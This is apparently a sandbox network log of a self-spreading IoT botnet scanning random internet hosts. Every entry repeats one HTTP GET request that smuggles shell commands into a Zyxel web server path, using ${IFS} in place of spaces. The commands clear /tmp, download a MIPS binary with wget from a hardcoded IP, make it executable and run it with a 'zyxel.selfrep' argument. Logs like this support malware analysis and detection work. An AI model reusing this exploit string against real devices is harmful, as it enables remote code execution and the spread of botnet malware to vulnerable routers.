                                                Jan 28, 2024 10:16:14.644279003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1801192.168.2.235008646.44.228.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644290924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1802192.168.2.233515658.165.162.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644321918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1803192.168.2.23502129.252.117.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644356012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1804192.168.2.23360369.253.231.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644375086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1805192.168.2.233454634.128.75.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644395113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1806192.168.2.2336134145.26.2.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644443989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1807192.168.2.235058461.97.240.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644471884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1808192.168.2.234543891.77.109.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644510984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1809192.168.2.235208897.55.62.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644510984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1810192.168.2.23340921.78.120.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644556999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1811192.168.2.2343722186.61.91.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644586086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1812192.168.2.2360730122.60.164.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644618988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1813192.168.2.2354034126.104.119.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644655943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1814192.168.2.2359880220.118.5.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644673109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1815192.168.2.235830499.110.213.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.644690037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1816192.168.2.2333432198.213.43.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647167921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1817192.168.2.2345252199.85.224.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647636890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1818192.168.2.234368097.229.135.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647654057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1819192.168.2.234059095.251.175.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647694111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1820192.168.2.2352886155.179.12.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647722006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1821192.168.2.235856038.104.83.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647758007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1822192.168.2.2356428201.183.38.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647773027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1823192.168.2.236009669.197.132.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647779942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1824192.168.2.2346142131.9.110.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647809029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1825192.168.2.234860695.219.194.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647830963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1826192.168.2.2352486109.168.179.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647861958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1827192.168.2.2349598153.127.186.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647883892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1828192.168.2.2349136216.137.7.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647905111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1829192.168.2.233953219.213.70.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647919893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1830192.168.2.235442262.143.141.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647974014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1831192.168.2.2344804195.233.138.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.647991896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1832192.168.2.234063863.61.8.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.648006916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1833192.168.2.2349926221.90.74.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.648032904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1834192.168.2.2337776115.171.200.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.648075104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1835192.168.2.234480635.210.123.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.660830021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1836192.168.2.2358110204.2.185.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.660846949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1837192.168.2.233977634.6.108.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.660871983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1838192.168.2.233932045.71.22.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.660897970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1839192.168.2.2336626167.185.86.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.660931110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1840192.168.2.234999465.2.38.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.660957098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1841192.168.2.2355374114.210.124.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.660979986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1842192.168.2.233955870.63.132.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.660998106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1843192.168.2.2359948115.78.237.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661031008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1844192.168.2.234720668.150.83.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661052942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1845192.168.2.2340524211.226.7.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661092043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1846192.168.2.234686220.159.134.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661113977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1847192.168.2.235884283.168.140.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661139011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1848192.168.2.236027025.171.238.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661181927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1849192.168.2.2332888142.220.236.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661197901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1850192.168.2.2344248160.12.159.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661231995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1851192.168.2.234193863.133.184.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661259890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1852192.168.2.235663017.159.111.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661288977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1853192.168.2.2354288152.175.188.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661299944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1854192.168.2.235217496.53.61.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661334991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1855192.168.2.23575029.187.92.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661369085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1856192.168.2.2334106203.221.119.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661386013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1857192.168.2.2346172159.133.167.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661436081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1858192.168.2.2345900103.37.251.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661474943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1859192.168.2.2340696181.9.252.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661483049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1860192.168.2.2349628218.46.21.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661508083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1861192.168.2.235443885.100.75.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.661534071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1862192.168.2.235178096.182.134.64443
                                                TimestampBytes transferredDirectionData
